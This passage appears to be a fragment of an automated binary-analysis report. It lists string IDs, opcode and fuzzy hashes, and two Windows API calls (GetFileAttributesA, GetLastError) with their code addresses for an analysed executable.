                                                                                                                • String ID: CustomCtrlInfo$CustomCtrlList
                                                                                                                • API String ID: 2818505249-1052600778
                                                                                                                • Opcode ID: 2a609cd160974749ad030957123f6410f801adf43dcc221db2bf98fc6f6877ce
                                                                                                                • Instruction ID: beb598171ee506bd90e5e93b1e4c99edef3199ae416f2fa069e764fcd08a2894
                                                                                                                • Opcode Fuzzy Hash: 2a609cd160974749ad030957123f6410f801adf43dcc221db2bf98fc6f6877ce
                                                                                                                • Instruction Fuzzy Hash: B3018176820258AADB08EB91C952FEEB774EF14314F10415FB112A30C1DBF83B44C7A5
                                                                                                                APIs
                                                                                                                • GetFileAttributesA.KERNEL32(-R,004BD3B6,?,00000000,00000000,00522DE4,?,?,?,004EF72C,00000000), ref: 004B0B59
                                                                                                                • GetLastError.KERNEL32(?,?,?,004EF72C,00000000), ref: 004B0B64
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: AttributesErrorFileLast
                                                                                                                • String ID: -R
                                                                                                                • API String ID: 1799206407-1098841771
                                                                                                                • Opcode ID: d969712471747f66dc4e811ebc3538afd9c851a6b2b9d195b696d8486bbea4e8
                                                                                                                • Instruction ID: 1e009806bf59564d53b0f1126dcaa97511a66ca536c95479395ebd5686f6ada8
                                                                                                                • Opcode Fuzzy Hash: d969712471747f66dc4e811ebc3538afd9c851a6b2b9d195b696d8486bbea4e8
                                                                                                                • Instruction Fuzzy Hash: 1DE0863000824056CA423BB49D4A79F3A516F6132EF514B4FF071891F3CBBC8840973E